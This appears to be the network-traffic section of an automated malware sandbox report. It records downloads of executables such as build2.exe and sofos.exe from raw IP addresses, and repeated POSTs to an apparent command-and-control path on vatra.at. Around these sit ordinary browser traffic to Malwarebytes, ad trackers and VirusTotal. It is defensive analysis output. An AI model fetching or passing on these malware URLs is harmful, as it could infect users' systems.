                                                                                                                                                                      http://49.12.113.110/
                                                                                                                                                                      http
                                                                                                                                                                      build2.exe
                                                                                                                                                                      257.9kB
                                                                                                                                                                      1.6MB
                                                                                                                                                                      1314
                                                                                                                                                                      1202

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://49.12.113.110/19

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://49.12.113.110/samefiles.zip

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://49.12.113.110/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      757 B
                                                                                                                                                                      465 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      833 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      659 B
                                                                                                                                                                      501 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 146.19.173.115:80
                                                                                                                                                                      http://146.19.173.115/sofos.exe
                                                                                                                                                                      http
                                                                                                                                                                      19.7kB
                                                                                                                                                                      1.2MB
                                                                                                                                                                      424
                                                                                                                                                                      827

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://146.19.173.115/sofos.exe

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      715 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      823 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      713 B
                                                                                                                                                                      790 B
                                                                                                                                                                      6
                                                                                                                                                                      5

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST http://vatra.at/tmp/

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      404
                                                                                                                                                                    • 190.147.188.50:80
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      http
                                                                                                                                                                      860 B
                                                                                                                                                                      790 B
                                                                                                                                                                    • 8.8.4.4:443
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.4kB
                                                                                                                                                                      8.8kB
                                                                                                                                                                      23
                                                                                                                                                                      27

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                    • 216.58.208.99:443
                                                                                                                                                                      https://ssl.gstatic.com/safebrowsing/csd/client_model_v5_variation_6.pb
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      3.5kB
                                                                                                                                                                      92.2kB
                                                                                                                                                                      55
                                                                                                                                                                      77

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://ssl.gstatic.com/safebrowsing/csd/client_model_v5_variation_6.pb
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.9kB
                                                                                                                                                                      8.6kB
                                                                                                                                                                      17
                                                                                                                                                                      17

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      989 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      9
                                                                                                                                                                      8
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      989 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      9
                                                                                                                                                                      8
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      989 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      9
                                                                                                                                                                      8
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQob5OIozebeIXq0sgc4ybFnGMw2CY4K46d6m7HycnfLnADxXwwnEM&s=0
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.9kB
                                                                                                                                                                      20.1kB
                                                                                                                                                                      29
                                                                                                                                                                      31

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSg034PouhJbw4b_J6gQWj_S8YAFNIc2UP1sXKGxP7Q6ea_HdD605Uu&s=0

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR7WyhGISk_tuHEjDzrkFE-f6s_IE1sUpJwRRQF&s=0

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT9BCGbNnts-c5TmQ14zUPB1mChSJdHLbIfedI4RDBBhbYCaaxT7Fwh&s=0

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTdx0GZpOzAhKiCNvN8qH0EmjCgz1zgwwFhTtv8fc6MxIB2Adc1xJPF&s=0

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ7E5hkTFjYbyZa4TkMj95_LcI7jkYiOtOgiEnOL7z0jO4Qu4dObhl3&s=0

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQob5OIozebeIXq0sgc4ybFnGMw2CY4K46d6m7HycnfLnADxXwwnEM&s=0
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      989 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      9
                                                                                                                                                                      8
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      989 B
                                                                                                                                                                      5.3kB
                                                                                                                                                                      9
                                                                                                                                                                      8
                                                                                                                                                                    • 65.9.86.124:443
                                                                                                                                                                      https://www.malwarebytes.com/images/favicon-32x32.png
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      21.9kB
                                                                                                                                                                      741.5kB
                                                                                                                                                                      357
                                                                                                                                                                      608

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/adwcleaner

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/fonts.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/js/library/jquery.min.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/bootstrap_mwb.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/bootstrap_overrides.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/font-awesome.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/styles.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/styles_overrides.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/styles_components.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/master_page.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/component-project/templates/navwrap/masterpage-svg.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/user-experience/animation/animate-on-scroll.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/css/pages/adwcleaner/index.min.css

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/__bundle.css?f=

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.malwarebytes.com/__bundle.js?f=L2pzL3N0cmluZy9zdHJpbmcubWluLmpzLC9qcy9zZXNzaW9uL3Nlc3Npb24ubWluLmpzLC9qcy9jb3VudHJ5Lm1pbi5qcywvanMvZ2xvYmFsX213Yi5taW4uanMsL2pzL3BlcnNvbmFsaXphdGlvbi91c2VyLm1pbi5qcywvanMvbWVkaWEvaW1hZ2VzL2xhenlsb2FkaW5nLm1pbi5qcywvanMvYm9vdHN0cmFwLm1pbi5qcywvanMvbW9kZXJuaXpyLmpzLC9scC9zZW0vYXNzZXRzL2pzL3Jlc3BvbmQubWluLmpzLC9qcy9nbG9iYWwuanMsL2pzL3hzLm1pbi5qcywvanMvdXNlci1leHBlcmllbmNlL2FuaW1hdGlvbi9hbmltYXRlLW9uLXNjcm9sbC5taW4uanN8MTFBQjcxMjc4MUE2MkQ0MUYwQzM1REExN0E4MzFFNTE=

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response


                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://cdn.cookielaw.org/scripttemplates/6.38.0/assets/v2/otPcPanel.json

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://cdn.cookielaw.org/scripttemplates/6.38.0/assets/otCommonStyles.css

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 104.18.27.85:443
                                                                                                                                                                      https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.7kB
                                                                                                                                                                      3.8kB
                                                                                                                                                                      15
                                                                                                                                                                      13

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 157.240.247.8:443
                                                                                                                                                                      connect.facebook.net
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      4.3kB
                                                                                                                                                                      146.8kB
                                                                                                                                                                      70
                                                                                                                                                                      122
                                                                                                                                                                    • 95.101.74.227:443
                                                                                                                                                                      https://snap.licdn.com/li.lms-analytics/insight.beta.min.js
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.8kB
                                                                                                                                                                      11.2kB
                                                                                                                                                                      17
                                                                                                                                                                      22

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://snap.licdn.com/li.lms-analytics/insight.min.js

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://snap.licdn.com/li.lms-analytics/insight.beta.min.js

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 204.79.197.200:443
                                                                                                                                                                      bat.bing.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.9kB
                                                                                                                                                                      21.3kB
                                                                                                                                                                      28
                                                                                                                                                                      33
                                                                                                                                                                    • 199.232.148.157:443
                                                                                                                                                                      static.ads-twitter.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.0kB
                                                                                                                                                                      21.4kB
                                                                                                                                                                      21
                                                                                                                                                                      27
                                                                                                                                                                    • 104.16.122.175:443
                                                                                                                                                                      https://unpkg.com/web-vitals@1.1.0/dist/web-vitals.umd.js
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.7kB
                                                                                                                                                                      5.1kB
                                                                                                                                                                      17
                                                                                                                                                                      15

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://unpkg.com/web-vitals@1.1.0/dist/web-vitals.umd.js

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 23.46.212.45:443
                                                                                                                                                                      https://munchkin.marketo.net/162/munchkin.js
                                                                                                                                                                      tls, http
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.2kB
                                                                                                                                                                      11.7kB
                                                                                                                                                                      17
                                                                                                                                                                      19

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://munchkin.marketo.net/munchkin.js

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://munchkin.marketo.net/162/munchkin.js

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 152.199.2.76:443
                                                                                                                                                                      cdn.bizible.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      4.9kB
                                                                                                                                                                      41.2kB
                                                                                                                                                                      51
                                                                                                                                                                      54
                                                                                                                                                                    • 142.250.179.142:443
                                                                                                                                                                      https://analytics.google.com/g/collect?v=2&tid=G-K8KCHE3KSC&gtm=2oe120&_p=675500081&_gaz=1&gdid=dYWJhMj&cid=1651572003.1673272145&ul=en-us&sr=1280x720&_s=1&dl=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&sid=1673272144&sct=1&seg=0&dr=https%3A%2F%2Fwww.google.com%2F&dt=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&en=page_view&_fv=1&_nsi=1&_ss=1&ep.content_group=Consumer
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.3kB
                                                                                                                                                                      8.5kB
                                                                                                                                                                      17
                                                                                                                                                                      16

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://analytics.google.com/g/collect?v=2&tid=G-K8KCHE3KSC&gtm=2oe120&_p=675500081&_gaz=1&gdid=dYWJhMj&cid=1651572003.1673272145&ul=en-us&sr=1280x720&_s=1&dl=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&sid=1673272144&sct=1&seg=0&dr=https%3A%2F%2Fwww.google.com%2F&dt=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&en=page_view&_fv=1&_nsi=1&_ss=1&ep.content_group=Consumer
                                                                                                                                                                    • 104.244.42.5:443
                                                                                                                                                                      https://t.co/i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.9kB
                                                                                                                                                                      4.3kB
                                                                                                                                                                      14
                                                                                                                                                                      15

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://t.co/i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 104.244.42.67:443
                                                                                                                                                                      https://analytics.twitter.com/i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.9kB
                                                                                                                                                                      4.4kB
                                                                                                                                                                      14
                                                                                                                                                                      15

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://analytics.twitter.com/i/adsct?bci=3&eci=2&event_id=a7f3d786-3019-4694-af5b-fe80e953e554&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=e70e3ca2-595f-48bf-998d-19439b1dc4de&tw_document_href=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=o1m5j&type=javascript&version=2.3.29

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 142.250.27.154:443
                                                                                                                                                                      https://stats.g.doubleclick.net/g/collect?v=2&tid=G-K8KCHE3KSC&cid=1651572003.1673272145&gtm=2oe120&aip=1
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.9kB
                                                                                                                                                                      6.4kB
                                                                                                                                                                      17
                                                                                                                                                                      17

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://stats.g.doubleclick.net/g/collect?v=2&tid=G-K8KCHE3KSC&cid=1651572003.1673272145&gtm=2oe120&aip=1
                                                                                                                                                                    • 104.18.27.85:443
                                                                                                                                                                      https://privacyportal.onetrust.com/request/v1/consentreceipts
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      18.0kB
                                                                                                                                                                      3.7kB
                                                                                                                                                                      26
                                                                                                                                                                      18

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://privacyportal.onetrust.com/request/v1/consentreceipts

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      201
                                                                                                                                                                    • 108.156.60.54:443
                                                                                                                                                                      adwcleaner.malwarebytes.com
                                                                                                                                                                      tls, https
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.0kB
                                                                                                                                                                      4.8kB
                                                                                                                                                                      10
                                                                                                                                                                      10
                                                                                                                                                                    • 108.156.60.54:443
                                                                                                                                                                      https://adwcleaner.malwarebytes.com/adwcleaner?channel=release
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      223.3kB
                                                                                                                                                                      9.1MB
                                                                                                                                                                      4502
                                                                                                                                                                      6498

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://adwcleaner.malwarebytes.com/adwcleaner?channel=release

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 172.217.168.194:443
                                                                                                                                                                      https://googleads.g.doubleclick.net/pagead/viewthroughconversion/930356311/?random=1673272144838&cv=11&fst=1673272144838&bg=ffffff&guid=ON&async=1&gtm=2oa120&u_w=1280&u_h=720&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&ref=https%3A%2F%2Fwww.google.com%2F&tiba=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&did=dYWJhMj&gdid=dYWJhMj&auid=93243314.1673272144&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.1kB
                                                                                                                                                                      7.7kB
                                                                                                                                                                      18
                                                                                                                                                                      19

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://googleads.g.doubleclick.net/pagead/viewthroughconversion/930356311/?random=1673272144838&cv=11&fst=1673272144838&bg=ffffff&guid=ON&async=1&gtm=2oa120&u_w=1280&u_h=720&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Fwww.malwarebytes.com%2Fadwcleaner&ref=https%3A%2F%2Fwww.google.com%2F&tiba=AdwCleaner%20-%20Free%20Adware%20Cleaner%20%26%20Removal%20Tool%20%7C%20Malwarebytes&did=dYWJhMj&gdid=dYWJhMj&auid=93243314.1673272144&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                    • 192.28.144.124:443
                                                                                                                                                                      805-usg-300.mktoresp.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.9kB
                                                                                                                                                                      5.3kB
                                                                                                                                                                      10
                                                                                                                                                                      13
                                                                                                                                                                    • 13.107.42.14:443
                                                                                                                                                                      px.ads.linkedin.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      2.7kB
                                                                                                                                                                      9.0kB
                                                                                                                                                                      18
                                                                                                                                                                      22
                                                                                                                                                                    • 65.9.86.29:443
                                                                                                                                                                      https://cdn.linkedin.oribi.io/partner/2594100/domain/malwarebytes.com/token
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.7kB
                                                                                                                                                                      7.5kB
                                                                                                                                                                      16
                                                                                                                                                                      20

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://cdn.linkedin.oribi.io/partner/2594100/domain/malwarebytes.com/token

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200
                                                                                                                                                                    • 157.240.221.35:443
                                                                                                                                                                      www.facebook.com
                                                                                                                                                                      tls
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      22.7kB
                                                                                                                                                                      4.2kB
                                                                                                                                                                      32
                                                                                                                                                                      26
                                                                                                                                                                    • 142.250.179.163:443
                                                                                                                                                                      https://update.googleapis.com/service/update2/json?cup2key=10:1503554099&cup2hreq=2a946d63babb4161d327443b4870ce5844a4c3bba6775d74a2ef2cd2f1f29b4c
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      8.7kB
                                                                                                                                                                      11.4kB
                                                                                                                                                                      23
                                                                                                                                                                      22

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://update.googleapis.com/service/update2/json?cup2key=10:1503554099&cup2hreq=2a946d63babb4161d327443b4870ce5844a4c3bba6775d74a2ef2cd2f1f29b4c
                                                                                                                                                                    • 34.104.35.123:80
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      http
                                                                                                                                                                      13.5kB
                                                                                                                                                                      541.1kB
                                                                                                                                                                      211
                                                                                                                                                                      396

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      HEAD http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      200

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                    • 23.236.181.126:443
                                                                                                                                                                      https
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      88.9kB
                                                                                                                                                                      29.6kB
                                                                                                                                                                      103
                                                                                                                                                                      80
                                                                                                                                                                    • 127.0.0.1:15570
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                    • 216.58.208.99:443
                                                                                                                                                                      https://beacons.gcp.gvt2.com/domainreliability/upload
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      12.6kB
                                                                                                                                                                      7.1kB
                                                                                                                                                                      26
                                                                                                                                                                      21

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://beacons.gcp.gvt2.com/domainreliability/upload

                                                                                                                                                                    • 216.58.208.99:443
                                                                                                                                                                      beacons.gcp.gvt2.com

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/672.535889cc9667fec91198.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/3855.9955e2e9c1622f3aa1de.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/6842.d82ffeefb51cc24f374f.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/410.690cf5d5695a51f566f6.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/4509.41bab6b5b8e300ef03da.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/submissions/add

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/icon.types-peexe.60b13774c01cc2f83b9d.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/dropped_files

                                                                                                                                                                      HTTP Request

